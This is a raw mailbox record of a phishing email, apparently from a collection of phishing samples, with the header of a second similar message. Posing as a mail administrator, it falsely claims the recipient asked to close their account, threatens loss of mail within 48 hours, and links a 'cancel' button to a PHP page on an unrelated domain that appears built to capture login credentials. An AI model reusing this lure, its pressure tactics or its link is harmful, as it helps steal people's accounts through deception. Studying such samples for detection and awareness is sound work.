From: "Mail Admin" <admin@neasonline.no>
Date: Sun, 06 Nov 2016 21:52:40 +0100
Reply-To: noreply@webmaster.com
Message-Id: <20161106205245.98FCDC60F4C@zm1.i2cinc.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 431

You will not see this in a MIME-aware mail reader.
--===============1193686688==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

         =

   =

  	  =

Dear jose@monkey.org,

We receive an authority from you to close down your mailbox account which i=
s in progress right now.

note you will loose all your valuable mails in your inbox and sent folder, =
If you will like to continue using your mailbox you have this opportunity t=
o cancel this request.

click here to cancel closure request now

If you fail to cancel this request before 48hrs you will not have access to=
 you mailbox and it will be close down.

Thanks for your co-operation.
 Request Team. =


	 =

  =

  	 This mail was sent to jose@monkey.org and can not be reply.
 =20
--===============1193686688==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV tabIndex=3D0 id=3Dyui_3_16_0_ym19_1_14783=
21693401_67005 class=3D"body undoreset" style=3D'BOX-SIZING: border-box; FO=
NT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial,=
 "Lucida Grande", sans-serif; WIDTH: 769px; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT=
-STYLE: normal; PADDING-TOP: 12px; PADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2=
; DISPLAY: table; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255=
); TEXT-INDENT: 0px; -webkit-padding-start: 0px; font-variant-ligatures: no=
rmal; font-variant-caps: normal; -webkit-text-stroke-width: 0px'>
<DIV id=3Dyui_3_16_0_ym19_1_1478321693401_67004 class=3Demail-wrapped style=
=3D"WORD-WRAP: break-word; WIDTH: auto; DISPLAY: table-cell; -webkit-paddin=
g-start: 0px">
<DIV id=3Dyiv8331236009 style=3D"-webkit-padding-start: 0px">
<DIV id=3Dyui_3_16_0_ym19_1_1478321693401_67003 style=3D"-webkit-padding-st=
art: 0px">
<DIV id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_10578 class=3Dyiv833=
1236009thread-body style=3D"-webkit-padding-start: 0px">
<DIV id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_10625 class=3D"yiv83=
31236009body yiv8331236009undoreset" style=3D"-webkit-padding-start: 0px">
<DIV id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_10624 class=3Dyiv833=
1236009email-wrapped style=3D"-webkit-padding-start: 0px">
<DIV id=3Dyiv8331236009 style=3D"-webkit-padding-start: 0px">
<DIV id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_10623 style=3D"-webk=
it-padding-start: 0px">
<TABLE id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2381 style=3D"FONT=
-SIZE: 15px; FONT-FAMILY: Calibri, sans-serif; WHITE-SPACE: normal; WORD-SP=
ACING: 0px; BORDER-COLLAPSE: separate; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(68,68,68); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDI=
NG-TOP: 0px; PADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; DISPLAY=
: table; LETTER-SPACING: normal; LINE-HEIGHT: 21px; PADDING-RIGHT: 0px; BAC=
KGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-padding-start: 0=
px" cellSpacing=3D0 cellPadding=3D0 bgColor=3D#ffffff border=3D1>
<TBODY id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2380 style=3D"WIDT=
H: 644px; LINE-HEIGHT: 21px; -webkit-padding-start: 0px">
<TR id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2385 style=3D"VERTICA=
L-ALIGN: inherit; DISPLAY: table-row; LINE-HEIGHT: 21px; -webkit-padding-st=
art: 0px">
<TD id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2552 style=3D"BORDER-=
TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDER-RIGHT: medium none=
; BORDER-BOTTOM: medium none; BORDER-SPACING: 2px; BORDER-LEFT: medium none=
; MARGIN: 0px; DISPLAY: table-cell; LINE-HEIGHT: 21px; -webkit-padding-star=
t: 0px" height=3D2></TD></TR>
<TR id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2379 style=3D"VERTICA=
L-ALIGN: inherit; DISPLAY: table-row; LINE-HEIGHT: 21px; -webkit-padding-st=
art: 0px">
<TD id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2520 style=3D"BORDER-=
TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDER-RIGHT: medium none=
; BORDER-BOTTOM: medium none; BORDER-SPACING: 2px; BORDER-LEFT: medium none=
; MARGIN: 0px; DISPLAY: table-cell; LINE-HEIGHT: 21px; -webkit-padding-star=
t: 0px" width=3D15></TD>
<TD id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2378 style=3D"FONT-SI=
ZE: 13px; BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDER-R=
IGHT: medium none; BORDER-BOTTOM: medium none; COLOR: rgb(34,34,34); BORDER=
-SPACING: 2px; BORDER-LEFT: medium none; MARGIN: 0px; DISPLAY: table-cell; =
LINE-HEIGHT: 18px; -webkit-padding-start: 0px" vAlign=3Dtop width=3D621>
<P id=3Dyui_3_16_0_ym19_1_1478321693401_67002 style=3D"PADDING-BOTTOM: 0px;=
 PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px"><BR style=3D"LINE-HEIGHT: 18px; -we=
bkit-padding-start: 0px"><SPAN id=3Dyiv8331236009yui_3_16_0_ym19_1_14782129=
21443_12264 style=3D"FONT-SIZE: 15px; FONT-FAMILY: Calibri, sans-serif; COL=
OR: rgb(0,0,0); LINE-HEIGHT: normal; -webkit-padding-start: 0px">Dear jose@=
monkey.org</SPAN>,<BR style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0p=
x"><BR style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px">We receive a=
n authority from you to close down your mailbox account which is in progres=
s right now.<BR style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px"><BR=
 style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px">note you will loos=
e all your valuable mails in your inbox and sent folder,&nbsp;If you will l=
ike to continue using your mailbox you have this opportunity to cancel this=
 request.<BR style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px"><BR st=
yle=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px"><A id=3Dyiv8331236009=
yui_3_16_0_ym19_1_1478212921443_2518 style=3D"BORDER-LEFT-WIDTH: 1px; FONT-=
SIZE: 11px; TEXT-DECORATION: none; BORDER-RIGHT-WIDTH: 1px; BORDER-TOP-COLO=
R: rgb(48,121,237); BACKGROUND: rgb(77,144,254); BORDER-BOTTOM-WIDTH: 1px; =
BORDER-LEFT-COLOR: rgb(48,121,237); FONT-WEIGHT: bold; COLOR: white; OUTLIN=
E-WIDTH: medium; PADDING-BOTTOM: 0px; BORDER-BOTTOM-COLOR: rgb(48,121,237);=
 TEXT-ALIGN: center; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 8=
px; MIN-HEIGHT: 27px; MARGIN: 0px; DISPLAY: inline-block; BORDER-RIGHT-COLO=
R: rgb(48,121,237); OUTLINE-COLOR: invert; LINE-HEIGHT: 27px; PADDING-RIGHT=
: 8px; BORDER-TOP-WIDTH: 1px; -webkit-padding-start: 0px; border-radius: 2p=
x" href=3D"http://turkisholympiad.us//wp-includes/images/all/index.php?user=
name=3Djose@monkey.org" rel=3Dnofollow target=3D_blank><SPAN id=3Dyiv833123=
6009yui_3_16_0_ym19_1_1478212921443_2519 style=3D"LINE-HEIGHT: 15px; -webki=
t-padding-start: 0px">click here to cancel closure request now</SPAN></A><B=
R style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px"><BR style=3D"LINE=
-HEIGHT: 18px; -webkit-padding-start: 0px">If you fail to cancel this reque=
st before 48hrs you will not have access to you mailbox and it will be clos=
e down.<BR style=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px"><BR styl=
e=3D"LINE-HEIGHT: 18px; -webkit-padding-start: 0px">Thanks for your co-oper=
ation.</P>
<P id=3Dyui_3_16_0_ym19_1_1478321693401_67011 style=3D"PADDING-BOTTOM: 0px;=
 PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px">Request Team.&nbsp;<BR style=3D"LIN=
E-HEIGHT: 18px; -webkit-padding-start: 0px"></P></TD>
<TD style=3D"BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDE=
R-RIGHT: medium none; BORDER-BOTTOM: medium none; BORDER-SPACING: 2px; BORD=
ER-LEFT: medium none; MARGIN: 0px; DISPLAY: table-cell; LINE-HEIGHT: 21px; =
-webkit-padding-start: 0px" width=3D8></TD></TR>
<TR id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2511 style=3D"VERTICA=
L-ALIGN: inherit; DISPLAY: table-row; LINE-HEIGHT: 21px; -webkit-padding-st=
art: 0px">
<TD style=3D"BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDE=
R-RIGHT: medium none; BORDER-BOTTOM: medium none; BORDER-SPACING: 2px; BORD=
ER-LEFT: medium none; MARGIN: 0px; DISPLAY: table-cell; LINE-HEIGHT: 21px; =
-webkit-padding-start: 0px" height=3D15></TD></TR>
<TR id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2513 style=3D"VERTICA=
L-ALIGN: inherit; DISPLAY: table-row; LINE-HEIGHT: 21px; -webkit-padding-st=
art: 0px">
<TD style=3D"BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDE=
R-RIGHT: medium none; BORDER-BOTTOM: medium none; BORDER-SPACING: 2px; BORD=
ER-LEFT: medium none; MARGIN: 0px; DISPLAY: table-cell; LINE-HEIGHT: 21px; =
-webkit-padding-start: 0px" width=3D15></TD>
<TD id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_2512 style=3D"FONT-SI=
ZE: 11px; BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDER-R=
IGHT: medium none; BORDER-BOTTOM: medium none; COLOR: rgb(119,119,119); BOR=
DER-SPACING: 2px; BORDER-LEFT: medium none; MARGIN: 0px; DISPLAY: table-cel=
l; LINE-HEIGHT: 15px; -webkit-padding-start: 0px" width=3D621>This mail was=
 sent to jose@monkey.org and&nbsp;can not&nbsp;be reply.</TD></TR></TBODY><=
/TABLE></DIV></DIV></DIV></DIV></DIV>
<DIV id=3Dyiv8331236009yui_3_16_0_ym19_1_1478212921443_10643 class=3D"yiv83=
31236009thread-footer yiv8331236009withicons" style=3D"-webkit-padding-star=
t: 0px"><SPAN class=3Dyiv8331236009addconvtitle style=3D"-webkit-padding-st=
art: 0px"></SPAN>&nbsp;</DIV></DIV></DIV></DIV></DIV></BODY></HTML>
--===============1193686688==--

From jose@monkey.org Tue Nov 15 00:05:05 2016 +0000
Return-Path: mail@server.com
Delivered-To: jose@monkey.org
X-FDA: 72183030570.04.thumb41_2c586f18b3709
X-Spam-Summary: 75,0,0,3e24804bdd95d246,d41d8cd98f00b204,mail@server.com,:,RULES_HIT:2:41:72:379:495:800:962:967:969:973:983:988:989:1147:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1571:1575:1588:1592:1594:1685:1714:1730:1776:1792:2196:2198:2199:2200:2525:2527:2549:2560:2563:2610:2693:2737:2790:2894:2945:3138:3139:3140:3141:3142:3351:3865:3866:3867:3868:3871:3872:3873:3874:3936:3953:4050:4120:4361:5007:6261:6669:6678:6684:7628:7652:8516:8517:8518:8599:8603:8797:8987:9121:9388:9390:9871:10044:10215:10241:10346:10489:11233:11480:11657:11658:11914:12043:12438:12517:12519:12764:12986:13005:13017:13018:13019:13025:13139:13237:13439:13846:13898:13975:14096:21080:21212:21325:21433:21451:21524:30016:30021:30022:30026:30054,0,RBL:107.152.102.188-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:29,LUA_SUMMARY:none
X-HE-Tag: thumb41_2c586f18b3709
X-Filterd-Recvd-Size: 9758
Received: from server.mt-web.net (server.mt-web.net [107.152.102.188])
	by imf03.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 15 Nov 2016 00:05:04 +0000 (UTC)
Received: from [37.203.213.117] (port=50050)
	by server.mt-web.net with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <mail@server.com>)
	id 1c6RCh-0005KV-TP
	for jose@monkey.org; Mon, 14 Nov 2016 19:02:24 -0500
Content-Type: multipart/alternative; boundary="===============1935834391=="
MIME-Version: 1.0
Subject: Confirm Your Email De-activation request for jose@monkey.org
To: jose@monkey.org
